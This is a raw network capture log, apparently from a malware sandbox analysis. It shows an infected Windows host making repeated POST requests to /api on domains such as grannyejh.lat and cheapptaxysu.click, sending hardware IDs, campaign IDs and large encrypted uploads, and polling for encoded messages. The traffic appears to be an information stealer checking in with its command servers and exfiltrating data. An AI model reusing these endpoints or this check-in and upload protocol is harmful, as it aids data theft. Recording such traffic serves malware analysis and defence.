name="hwid"86648A4BEF1E4DA3AC8923850305D13E--WU2670ZFK75MEGQContent-Disposition: form-data; name="pid"2--WU2670ZFK75MEGQContent-Disposition: form-data; name="lid"PsFKDg--pablo--WU267
2024-12-19 09:13:32 UTC	1128	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=89ivapgg6l27427chne5341341; expires=Mon, 14 Apr 2025 02:59:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F8I31DKNV1OtlklKgUXrOeWyX719ROHRx01NP%2BRua%2B2WwP5VmyzGrKlM2wRzXYD%2FoRtqYKz%2B6uk7ryiGjVaszP4%2FgrK1keMdA3sglJjljjEZPU1vefVQIlJ5KO%2BTQ8Qs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464697db6ff02d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1784&rtt_var=676&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2831&recv_bytes=13775&delivery_rate=1610590&cwnd=77&unsent_bytes=0&cid=b94a5698731c8d45&ts=15883&x=0"
2024-12-19 09:13:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:13:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.6	50274	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:20 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: grannyejh.lat
2024-12-19 09:13:20 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-19 09:13:32 UTC	1123	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l21tjpoffqvl29k93pfvaqtps9; expires=Mon, 14 Apr 2025 02:59:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zfcIOfoiaJNenr2z%2BJiWZ6Oso%2FLxKgr%2BSKzUQYDZVMEYQz9QczaTierspw93fCAZqYGgL4lyey7wuo4kt9rgasMJ%2F6nLNhoNRdtziGT8RsWeyxfPmSAulD3x7c%2FfhwxB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4646ae2a2f7d11-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1800&rtt_var=681&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=904&delivery_rate=1600877&cwnd=227&unsent_bytes=0&cid=b06fbfae8108fb76&ts=12661&x=0"
2024-12-19 09:13:32 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-19 09:13:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.6	50307	104.21.66.85	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:26 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=AOE88WZDCW5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15066 Host: aspecteirs.lat
2024-12-19 09:13:26 UTC	15066	OUT	Data Raw: 2d 2d 41 4f 45 38 38 57 5a 44 43 57 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 4f 45 38 38 57 5a 44 43 57 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 4f 45 38 38 57 5a 44 43 57 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 56 6d 72 30 74 2d 2d 69 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 41 4f 45 38 38 57 5a 44 43 57 35 0d 0a 43 Data Ascii: --AOE88WZDCW5Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--AOE88WZDCW5Content-Disposition: form-data; name="pid"2--AOE88WZDCW5Content-Disposition: form-data; name="lid"CVmr0t--installs--AOE88WZDCW5C
2024-12-19 09:13:38 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3dstsoco729jtr3ch788ojhhmf; expires=Mon, 14 Apr 2025 03:00:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X7%2BDDNjAj5Q5iYooGixPUg93v417QlTtHfZy214JA5XLL%2BFexME4t%2FlwvaPBgJq8ghru8TO7tz7RzTMQVB8Cf9fy7o%2FEfCd5kMmExpzT5pRSHedxjuw7ZM05TnkJRKCzgQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4646d529b05e76-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1646&rtt_var=619&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2832&recv_bytes=15997&delivery_rate=1764350&cwnd=209&unsent_bytes=0&cid=76d418f38ae64280&ts=12519&x=0"
2024-12-19 09:13:38 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:13:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.6	50309	172.67.177.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:26 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=V26X8ZWJVTFU9KX0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 29004 Host: cheapptaxysu.click
2024-12-19 09:13:26 UTC	15331	OUT	Data Raw: 2d 2d 56 32 36 58 38 5a 57 4a 56 54 46 55 39 4b 58 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 32 36 58 38 5a 57 4a 56 54 46 55 39 4b 58 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 32 36 58 38 5a 57 4a 56 54 46 55 39 4b 58 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 56 32 36 58 38 5a 57 Data Ascii: --V26X8ZWJVTFU9KX0Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--V26X8ZWJVTFU9KX0Content-Disposition: form-data; name="pid"1--V26X8ZWJVTFU9KX0Content-Disposition: form-data; name="lid"CZJvss----V26X8ZW
2024-12-19 09:13:26 UTC	13673	OUT	Data Raw: c4 71 2c eb 23 45 97 5d 54 13 3b ac 45 46 6c 0b fa 27 07 3a 78 1c d8 d6 f9 4f 77 6c ca 91 ff eb db 47 77 7e 14 af 18 53 17 d6 93 b9 66 f5 05 89 70 9a c7 2f fb 65 9d 7f 68 8c 07 9b cc 85 5c 47 dc 7b 75 2e dc 45 03 83 ea df ca 8e 46 e3 39 3f bf 38 3a 42 a0 06 f9 90 fa 21 d7 52 cf 01 ee 16 03 22 49 97 7e 0e 2c d6 c4 d1 de ff 25 ba 99 08 96 7d 74 e7 9e 6a 67 c1 83 a4 f0 d4 22 5d e8 40 9f 44 ab 27 56 4f d8 7e 34 dc 6f 9b ef f3 c2 a8 5f 6e d5 88 0a 7e 02 53 94 84 39 38 5a fa 8f d7 16 91 0e b9 84 dd 28 6f 72 2d 57 4e 65 7c ac 06 89 06 91 03 3a 4e ef d9 cd 6b a5 92 8f 36 18 4b cd 65 a9 f9 25 43 6b 8b 9b 78 47 9c 8f 19 e4 6f 8f a4 d1 1f 52 e2 d6 7b f0 9f a1 32 a5 04 c2 90 8e d6 95 bf 6e 6c 51 56 96 22 df f8 b9 5d 6e 2a c9 66 8a 20 bb 24 2b 68 de bf 76 95 82 6a b2 Data Ascii: q,#E]T;EFl':xOwlGw~Sfp/eh\G{u.EF9?8:B!R"I~,%}tjg"]@D'VO~4o_n~S98Z(or-WNe\|:Nk6Ke%CkxGoR{2nlQV"]n*f $+hvj
2024-12-19 09:13:41 UTC	1139	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=81qfuqibtbck6mck9ggikaoe6d; expires=Mon, 14 Apr 2025 03:00:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4RV0wQOs7w8Warg3DKQaI75yu4ZRjywXCfrNfBUUptVMUfYCS4C%2BYZqkMkYDGc6rcCm0pTbnid9%2BH4W9U3CW1%2FstyFmyPROS%2F2nuF5Aj50V9OJdwDs74IvkkDkxtras%2F%2FpmS9ww%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4646d7ccce42ca-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1684&min_rtt=1677&rtt_var=643&sent=17&recv=33&lost=0&retrans=0&sent_bytes=2842&recv_bytes=29988&delivery_rate=1684939&cwnd=252&unsent_bytes=0&cid=70d04b3d0bccdda0&ts=14957&x=0"
2024-12-19 09:13:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:13:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.6	50313	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:28 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QLEUL3FC0XFJGK5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 48133 Host: grannyejh.lat
2024-12-19 09:13:28 UTC	15331	OUT	Data Raw: 2d 2d 51 4c 45 55 4c 33 46 43 30 58 46 4a 47 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 51 4c 45 55 4c 33 46 43 30 58 46 4a 47 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 4c 45 55 4c 33 46 43 30 58 46 4a 47 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d Data Ascii: --QLEUL3FC0XFJGK5Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA300D57F9DDD37BE0C--QLEUL3FC0XFJGK5Content-Disposition: form-data; name="pid"1--QLEUL3FC0XFJGK5Content-Disposition: form-data; name="lid"yau6Na--6989783370--
2024-12-19 09:13:28 UTC	15331	OUT	Data Raw: 77 68 7e 03 d8 3e 07 b1 1f 61 c1 47 bb f5 0b e7 61 60 b7 55 73 f5 db 9e a8 dd 5f ef cb b2 9d dc fd 79 44 ef 3f b7 25 10 11 14 83 aa 20 d6 63 57 c5 d9 4e ca a2 6b f7 78 ff ae 81 8e 9f 05 f6 74 fc 5e de fa ea d4 ff fa f1 b9 d1 6c 16 49 7d 66 65 2b 86 aa 53 95 f1 0c 8c 75 58 32 5f 97 ff dd c6 70 dd 21 ac a4 5a b6 e7 4a 50 c1 36 52 30 68 ff 6e 75 34 16 49 f9 f5 c3 d2 52 3b 5c 25 5d bb 6a d8 36 cf 71 80 ba db 01 e1 c2 f1 be 03 56 cb 23 b0 b9 ff b0 5e c6 82 65 9f 1b 3d 16 eb c8 70 8d 0e 88 85 28 86 0f f4 71 34 3a b6 2a 31 bf 9d 0e 70 df e3 f6 2e 33 78 c9 ae ac b6 98 1e 45 60 15 61 16 96 06 1e 13 15 10 d4 09 1b ff 7b 45 75 b6 45 22 b1 f8 82 32 01 d6 26 07 80 36 c9 83 3c b4 c6 19 f4 e9 6a 75 ee c5 24 71 f7 98 f0 8a ac 3a da 29 eb 33 2a e9 9c 41 58 dc 53 4c c4 56 Data Ascii: wh~>aGa`Us_yD?% cWNkxt^lI}fe+SuX2_p!ZJP6R0hnu4IR;\%]j6qV#^e=p(q4:1p.3xE`a{EuE"2&6<ju$q:)3AXSLV
2024-12-19 09:13:28 UTC	15331	OUT	Data Raw: df 28 93 c4 3d 82 79 c3 d0 56 26 45 c1 2d 17 8c 1d 51 91 9e 65 13 65 7d e1 54 57 1d c7 67 7b 79 ad b3 52 71 d4 c5 6d 43 a5 e5 35 d7 a3 94 97 02 60 ad 33 00 0f 57 d1 77 62 4b bd b6 32 48 bb fe 82 52 60 fd db b1 03 c0 d0 ec 11 b0 94 14 93 f7 8f c6 72 db b2 52 70 cf 70 e1 ea c1 8b 54 86 96 6f a2 4d ba 79 a9 b1 ba f0 46 d7 27 35 e8 fa bc 13 7d 6e 8e 1c 66 b7 a1 86 22 f7 5b 1c 85 36 98 60 13 2e 8f a6 0f 65 34 7a f4 2a c5 a5 3f 70 f2 4e d6 86 ab 02 73 ac 66 6d 21 10 20 05 1f b1 07 6e 0b ff e1 59 b5 a1 aa 0c e0 ec f9 75 74 c0 bc 69 63 7a 93 fc a9 a1 f4 ae 83 c9 e8 f2 c7 1f 35 61 6e fd 36 f4 c0 6d 2f 94 aa 6f 7e 29 c3 25 6d 1b da 74 13 7c bc ee a6 4c ff e4 d7 1e 6d 74 c9 56 d1 a5 f7 11 5f fd 3f 86 9d 7b 66 7c dc 74 36 f7 0a fb db 82 76 e0 ed c1 3c e0 b7 d3 a2 7d Data Ascii: (=yV&E-Qee}TWg{yRqmC5`3WwbK2HR`rRppToMyF'5}nf"[6`.e4z*?pNsfm! nYuticz5an6m/o~)%mt\|LmtV_?{f\|t6v<}
2024-12-19 09:13:28 UTC	2140	OUT	Data Raw: b2 ce 2b ee a8 f3 02 bc ff c7 7a 2f 75 61 6a 62 a1 a8 6a a7 da 75 78 f6 6e ed d8 f7 0f 0e 79 67 2d 1b fc 72 bb 7b 7a e6 6a bf 4d 9c 3f 4c 82 86 0b f7 ce 99 14 9b d9 63 92 3c 44 fb 23 73 2c 74 07 2a 17 c2 9d 33 08 48 a3 12 e4 94 53 f7 4f ab 0f b9 e8 37 62 9a 6a 26 ec 6a f3 90 06 a9 37 30 01 55 49 20 e3 d8 70 fa ca d0 ce db 34 55 62 bf 40 98 e5 65 20 fb 22 f3 fd f9 99 c2 7a 02 bb cf 41 c7 3d a7 72 50 c7 a2 58 8d 78 86 f7 d7 d4 49 f7 7e a2 33 23 6b 56 16 93 86 ec 05 39 a5 d6 3e 64 38 ae 27 fc 50 b2 04 b4 82 df 53 e0 5a 3a 8a b6 19 79 af f7 e5 2f ae e4 e7 e3 72 24 04 bf 57 b2 40 b2 6a 6c 8f 4d 21 73 3b 60 b4 4f cd da d8 28 7c a2 ae 21 b9 61 e6 c7 83 49 c6 56 01 45 ad b7 d1 0b 56 e8 5e 4f f3 a5 5c 51 db 58 93 0f 18 f7 77 5e ba 7f 89 82 70 3e 01 d3 de 70 65 41 Data Ascii: +z/uajbjuxnyg-r{zjM?Lc<D#s,t*3HSO7bj&j70UI p4Ub@e "zA=rPXxI~3#kV9>d8'PSZ:y/r$W@jlM!s;`O(\|!aIVEV^O\QXw^p>peA
2024-12-19 09:13:41 UTC	1123	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=42q2d8aod1d5tfl265n0g78pn0; expires=Mon, 14 Apr 2025 03:00:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H6Oa2%2BTVKs3TipgGlcIyaKTCRYo29FOIDdZ%2B1i4ZMXB%2FkT8KxgGIAwcvc0V5aKCY9J3LQay57jAXHW6mjAidGyPK15FoRALO99qjYEPucaZSyW0quCvCMLRiB71J64cQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4646e21e1b4213-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1596&rtt_var=609&sent=30&recv=54&lost=0&retrans=0&sent_bytes=2830&recv_bytes=49177&delivery_rate=1780487&cwnd=229&unsent_bytes=0&cid=da4f215c1a8ce22b&ts=13394&x=0"
2024-12-19 09:13:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:13:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.6	50317	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:33 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=G3SLZYGE1V5OJX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15081 Host: grannyejh.lat
2024-12-19 09:13:33 UTC	15081	OUT	Data Raw: 2d 2d 47 33 53 4c 5a 59 47 45 31 56 35 4f 4a 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 47 33 53 4c 5a 59 47 45 31 56 35 4f 4a 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 33 53 4c 5a 59 47 45 31 56 35 4f 4a 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 47 33 53 4c 5a 59 47 45 Data Ascii: --G3SLZYGE1V5OJXContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--G3SLZYGE1V5OJXContent-Disposition: form-data; name="pid"2--G3SLZYGE1V5OJXContent-Disposition: form-data; name="lid"PsFKDg--pablo--G3SLZYGE
2024-12-19 09:13:46 UTC	1125	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a8ve1vnfme6okr3v4ehrmoa48g; expires=Mon, 14 Apr 2025 03:00:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IthmXfdoVELYHoWabQ%2BoAHw8SOgTuBEEvH5MTCJUNptV8%2BngxGUeTpgcg%2F8a1rEBA0MuHxOIiZBx0AHuW4MpUt1jw9cjgfQ5MImb0XcK17S0kG1z%2FBtSzu6oGaIWsUcg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464702efea4258-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1563&rtt_var=612&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2831&recv_bytes=16014&delivery_rate=1750599&cwnd=181&unsent_bytes=0&cid=b662ce3b37058c90&ts=12999&x=0"
2024-12-19 09:13:46 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:13:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.6	50318	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:33 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: grannyejh.lat
2024-12-19 09:13:33 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-19 09:13:47 UTC	1125	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ec77rpn91ei3vltll515g4gqtv; expires=Mon, 14 Apr 2025 03:00:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tbTfF%2BIYxYTZlzp6sI%2B9%2BdiHwom7GekWOb7ku7fGoCHhqer9sg7V0Ca%2F9KMkf78pwZhYeYSouY44U%2FUVIPH3gKxFwwvplGBM6twkwofSdByoQIcQh%2Fh4BoXmdlQLE9ZO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464704db73184d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1583&rtt_var=610&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=944&delivery_rate=1768625&cwnd=238&unsent_bytes=0&cid=0248fca289f125e9&ts=13966&x=0"
2024-12-19 09:13:47 UTC	244	IN	Data Raw: 32 64 32 38 0d 0a 34 4b 4b 4a 4a 6b 6b 6d 59 4d 30 44 53 7a 78 59 43 4e 6e 42 6d 2f 59 43 67 49 70 37 35 4e 51 36 31 6a 6d 50 66 46 37 59 7a 59 57 62 67 50 38 45 63 78 4a 4d 37 33 41 75 48 6d 4a 38 71 37 54 2b 32 69 44 68 37 6c 6e 65 73 6c 75 36 53 75 70 51 66 4b 36 67 70 39 72 45 36 45 6f 36 51 30 7a 76 5a 6a 4d 65 59 6c 4f 69 34 2f 36 59 49 4c 71 6f 48 6f 36 32 57 37 70 62 37 68 63 78 71 4b 48 6d 69 4d 37 75 54 69 78 46 42 4b 78 76 4a 6c 6b 39 62 62 69 72 39 5a 39 76 36 4f 64 5a 79 50 5a 66 72 42 75 31 58 68 4f 39 75 65 53 74 77 2f 70 4e 61 31 74 4d 74 69 45 75 55 6e 6f 79 2b 36 44 2b 6c 47 37 6d 37 68 43 4d 76 46 4b 79 57 75 73 57 4c 72 47 72 37 59 6a 41 37 55 38 6d 54 42 43 68 5a 53 46 53 4f 32 65 34 34 37 66 55 5a 2f Data Ascii: 2d284KKJJkkmYM0DSzxYCNnBm/YCgIp75NQ61jmPfF7YzYWbgP8EcxJM73AuHmJ8q7T+2iDh7lneslu6SupQfK6gp9rE6Eo6Q0zvZjMeYlOi4/6YILqoHo62W7pb7hcxqKHmiM7uTixFBKxvJlk9bbir9Z9v6OdZyPZfrBu1XhO9ueStw/pNa1tMtiEuUnoy+6D+lG7m7hCMvFKyWusWLrGr7YjA7U8mTBChZSFSO2e447fUZ/
